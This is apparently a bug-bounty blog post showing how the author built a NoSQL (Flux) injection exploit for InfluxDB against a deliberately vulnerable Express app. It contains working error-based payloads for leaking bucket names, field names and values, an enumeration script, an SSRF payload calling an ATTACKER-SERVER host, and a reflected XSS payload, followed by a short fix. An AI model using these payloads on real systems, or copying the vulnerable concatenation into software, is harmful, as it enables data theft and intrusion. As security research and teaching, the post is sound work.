InfluxDB NoSQL Injection
How I developed a NoSQL Injection exploit for InfluxDB
In this post, I'll share my experience of discovering a NoSQL Injection vulnerability in a Bug Bounty program, affecting a database that gets little attention within the hacking community.
During the initial discovery, I was expecting to find a good blog post or tool teaching how to exploit NoSQL Injection on InfluxDB, but this was not the case, so I needed to understand how this database works to develop payload techniques to leak data from it.
Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.
What is InfluxDB
InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.
Initial Vulnerability Discovery
While analyzing the web application, I received the following error after sending the character " in a query parameter of the URL:
error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF
This looked a lot like an injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.
At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) to figure out what was happening in the backend.
InfluxDB NoSQL Queries
This is a simple example of an InfluxDB query, written in Flux (the query language of InfluxDB 2.x):
from(bucket: "example-bucket")
|> range(start: -1h)
|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")
The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.
Here's a breakdown of each part of the query:
from(bucket: "example-bucket"): This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." Buckets are like database names in SQL languages.
|> range(start: -1h): This part sets the time range for the data retrieval. The range function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameter start: -1h means the data will be fetched from one hour ago until the current time.
|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag"): This part applies a filter to the data based on certain conditions. The filter function is used to select specific data points that meet the defined criteria. The filter() function performs operations similar to the SELECT statement and the WHERE clause in SQL-like languages.
In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."
Building a Vulnerable Web Application
Now that we know the syntax, it's time to build our own vulnerable application, so we can develop a proof of concept that also works against real-world applications.
The following code is a vulnerable server example:
const express = require('express');
const {InfluxDB} = require('@influxdata/influxdb-client');

const app = express();
const token = 'REDACTED'; // InfluxDB token
const url = 'https://127.0.0.1'; // Local database endpoint
const org = 'myOrg';
const bucket = 'publicBucket';
const client = new InfluxDB({url, token});

// Run a Flux query and collect every returned row as a plain object.
async function query(fluxQuery) {
  const results = [];
  const queryApi = client.getQueryApi(org);
  for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
    const o = tableMeta.toObject(values);
    console.log(o);
    results.push(o);
  }
  return results;
}

app.get('/query', async (req, res) => {
  try {
    // VULNERABLE on purpose: req.query.data is concatenated into the query unsanitized.
    const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") ';
    const result = await query(fluxQuery);
    res.send(result);
  } catch (err) {
    // The error text is sent back to the client as-is.
    res.send(err.toString());
  }
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});
In the above example, the server concatenates user-supplied input (' + req.query.data + ') into the InfluxDB query without any sanitization:
const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") ';
const result = await query(fluxQuery);
By sending an HTTP request containing the character ", which terminates the string literal in the query, we can confirm that the application returns the same error previously seen on the Bug Bounty program's server.
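To make the breakage visible, here is a minimal sketch that isolates the same concatenation used by the /query handler. The helper name buildFluxQuery is hypothetical and exists only for this illustration; it does not talk to InfluxDB.

```javascript
// Same concatenation as the /query handler, isolated so the result can be inspected.
const bucket = 'publicBucket';

// Hypothetical helper: returns the Flux query the server would send for a given input.
function buildFluxQuery(data) {
  return 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + data + '") ';
}

// A benign value stays inside the string literal.
console.log(buildFluxQuery('hello'));

// A single double quote closes the literal early and leaves a stray quote behind,
// which is what the parser complains about.
console.log(buildFluxQuery('"'));
```

In the second query the filter ends in r._value == """), so everything after the injected quote is parsed as Flux code rather than data.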
Building The Payload
Leaking Bucket Names
As mentioned earlier, bucket names in InfluxDB are like database names in SQL databases, and just as in a SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.
After carefully reading the documentation, and assuming that the injection occurs inside the filter function, I arrived at the following error-based NoSQL Injection payload:
") |> yield(name: "1337")
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name))
//
The buckets() function lists the buckets available in the current organization.
The filter() function uses the r.name expression to filter by bucket name, where r is each row returned by the buckets query and name is a column returned by the buckets() function.
As you can see, InfluxDB queries support regex through the =~ operator, so the condition r.name =~ /^a.*/ is true if a bucket name starts with the letter a.
After that, the filter uses an and condition that calls the die() function with the bucket name as its argument. The die() function throws an error with a custom message passed in the msg parameter, which leaks the bucket name.
The payload also calls the yield() function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.
Finally, yield() must be separated from the buckets query by a new line, and at the end of the payload, after another new line, I added // to comment out everything that follows our injection.
In summary, if a bucket name that starts with the letter a exists in the database, it will trigger the die() function, which leaks the bucket name in the error message. If no bucket starts with the sent letter, the server returns an empty output with no errors.
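The payload can also be generated for any prefix. The following is a minimal sketch; the helper names escapeRegex and bucketLeakPayload are hypothetical, and the request path assumes the example server from this post.

```javascript
// Escape characters that are special inside a /regex/ literal, including "/".
function escapeRegex(text) {
  return text.replace(/[.*+?^${}()|[\]\\\/]/g, '\\$&');
}

// Build the three-line payload: close the string and filter, yield the original
// query, run buckets() with the die() oracle, then comment out the leftovers.
function bucketLeakPayload(prefix) {
  return [
    '") |> yield(name: "1337")',
    'buckets() |> filter(fn: (r) => r.name =~ /^' + escapeRegex(prefix) + '.*/ and die(msg:r.name))',
    '//',
  ].join('\n');
}

const payload = bucketLeakPayload('p');
console.log(payload);

// The new lines must survive transport, so the payload is URL-encoded
// before being placed in the data parameter.
console.log('/query?data=' + encodeURIComponent(payload));
```

Escaping the prefix matters once the enumeration reaches names containing characters such as a dot, which would otherwise match any character.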
Trying this on our vulnerable application, we can see that no error is returned for the letter a.
But sending the same payload with the letter p leaks the bucket name privateBucket.
To leak all bucket names, it's necessary to test all characters, appending another character after each match (for example pa, pb, pc...).
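This prefix search is easy to automate. The sketch below is one possible approach, not the exact tooling used during the engagement: the function leak is an assumed callback that sends the payload for a given prefix and resolves to the name found in the error message, or null when the server answers without an error. The alphabet and the bucket names in the stand-in are also assumptions.

```javascript
// Characters tried at each position; an assumption, extend it for other naming schemes.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-';

// leak(prefix) must resolve to the name leaked by die() for that prefix,
// or null when the server answers without an error.
async function enumerateNames(leak, prefix = '', found = new Set()) {
  for (const ch of ALPHABET) {
    const candidate = prefix + ch;
    const name = await leak(candidate);
    if (name === null) continue; // nothing starts with this prefix
    found.add(name);
    // Other names may share the prefix, so keep extending it.
    await enumerateNames(leak, candidate, found);
  }
  return found;
}

// Offline stand-in for the HTTP round trip, using made-up bucket names.
const fakeBuckets = ['privateBucket', 'publicBucket'];
const fakeLeak = async (prefix) => fakeBuckets.find((b) => b.startsWith(prefix)) ?? null;

enumerateNames(fakeLeak).then((names) => console.log([...names]));
```

Because die() leaks a full name on the first match, the recursion is only needed to find additional buckets that share a prefix with one already leaked.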
Leaking The Bucket Field Names
Now that we have the bucket names, we can try to fetch their contents. As in SQL databases, though, we sometimes need to specify column names to query specific data, so in this section I will show a technique to leak these column names in InfluxDB.
During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r))
//
The above payload uses a similar technique, with the yield() function at the start and a comment at the end of the payload:
The payload now uses the from() function to fetch the data of the leaked bucket name, then range(), which is required, and finally filter().
In the filter() function, I called die() again, but this time passing the entire result object as the argument. Since the die() function only accepts strings and the result object contains the whole data structure of the bucket, the server raises a verbose error that leaks it.
As you can see in the above screenshot, the server leaked this structure:
_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string
Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
//
As we can see, the vulnerable app leaked the field name sensitive_field because it matched the regex condition r._field =~ /s.*/.
Leaking Field Values
After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB: they are where the data is actually stored, so leaking them is the last step of the exploitation. To do that, we can reuse the technique used to leak the field names, this time specifying the field that we want to retrieve:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
//
By sending the above payload, the server responded with an error:
HttpError: runtime error @2:54-2:124: filter: type conflict: string != int
This occurs because the data stored in r._value is an integer and the die() function only accepts strings. To circumvent that, we can use the string() function to convert the integer value to a string, successfully leaking it in the error message:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
//
As we can see in the above screenshot, the value of sensitive_field is 1337. This means that we were able to fetch arbitrary data from other buckets!
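The two stages of this section differ only in the filter expression, so they can be generated from the leaked bucket and field names. This is a minimal sketch; fluxQuote, wrap, fieldNamePayload and fieldValuePayload are hypothetical helper names, and the quoting helper handles only backslashes and double quotes.

```javascript
// Put a known value inside a double-quoted Flux string.
// Minimal: handles backslashes and double quotes only.
function fluxQuote(text) {
  return '"' + text.replace(/\\/g, '\\\\').replace(/"/g, '\\"') + '"';
}

// Surround a query with the yield() prefix and the trailing comment.
function wrap(query) {
  return ['") |> yield(name: "1337")', query, '//'].join('\n');
}

// Stage 1: leak a field name matching a regex fragment such as "s.*".
function fieldNamePayload(bucket, pattern) {
  return wrap('from(bucket: ' + fluxQuote(bucket) + ') |> range(start: 0) |> filter(fn: (r) => r._field =~ /' + pattern + '/ and die(msg:r._field))');
}

// Stage 2: leak the value of one field; string() converts values such as
// integers so that die() accepts them.
function fieldValuePayload(bucket, field) {
  return wrap('from(bucket: ' + fluxQuote(bucket) + ') |> range(start: 0) |> filter(fn: (r) => r._field == ' + fluxQuote(field) + ' and die(msg:string(v:r._value)))');
}

console.log(fieldNamePayload('privateBucket', 's.*'));
console.log(fieldValuePayload('privateBucket', 'sensitive_field'));
```

Both calls reproduce the payloads shown in this section, with the bucket and field names taken from the earlier leaks.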
InfluxDB Server-Side Request Forgery
While reading the documentation, I noticed that some InfluxDB functions accept a host parameter. One of these functions is from().
By passing the host parameter to the from() function, we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:
") |> yield(name: "1337")
from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
//
And this is the request received by my Burp Collaborator:
If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.
This is not a vulnerability in InfluxDB itself; it is a feature being abused through a NoSQL Injection that stems from an insecure coding practice.
InfluxDB Cross-Site Scripting
Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:
app.get('/query', async (req, res) => {
  try {
    const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") ';
    const result = await query(fluxQuery);
    res.send(result);
  } catch (err) {
    res.send(err.toString());
  }
});
If you have an XSS radar like me, you will notice that when an error occurs in the InfluxDB query, the try { } catch { } statement sends the error back to the client with the Content-Type set to text/html, allowing the browser to load HTML and JavaScript.
Furthermore, we can control some of the data reflected in these errors, especially via the die() function.
Since the query API uses the GET method, it's possible to execute arbitrary JavaScript in the victim's browser by sending a malicious link:
") die(msg:"<img src=x onerror=alert(document.domain)>")//
This is not an InfluxDB vulnerability: the issue arises from a NoSQL Injection caused by an insecure coding practice, combined with the text/html Content-Type that Express uses by default when sending a string.
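For contrast with the insecure concatenation, here is a rough sketch of what escaping the user input could look like. The helpers escapeFluxString and buildSafeQuery are hypothetical and written for this post; this is not an audited sanitizer, and the official client library also appears to ship a flux tagged template meant for parameterized queries, which is worth checking in its documentation first.

```javascript
// Hypothetical helper: escape a value before placing it inside a
// double-quoted Flux string. Not a complete or audited sanitizer.
function escapeFluxString(value) {
  return String(value)
    .replace(/\\/g, '\\\\')           // backslash first, so later escapes are not doubled
    .replace(/"/g, '\\"')             // closing quote
    .replace(/\$\{/g, () => '\\${')   // start of string interpolation
    .replace(/\n/g, '\\n')
    .replace(/\r/g, '\\r');
}

// Same query shape as the example server, with both values escaped.
function buildSafeQuery(bucket, data) {
  return 'from(bucket:"' + escapeFluxString(bucket) + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + escapeFluxString(data) + '")';
}

// The injected quote is now escaped and stays inside the string literal.
console.log(buildSafeQuery('publicBucket', '") |> yield(name: "1337")'));
```

On the XSS side, sending the error with res.type('text/plain') before res.send() in Express would keep the browser from rendering the reflected message as HTML.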
Conclusion
In this blog post, I described how I developed an exploit for a NoSQL Injection vulnerability in a database that gets little attention within the hacking community, and how I leveraged this issue to achieve SSRF and XSS.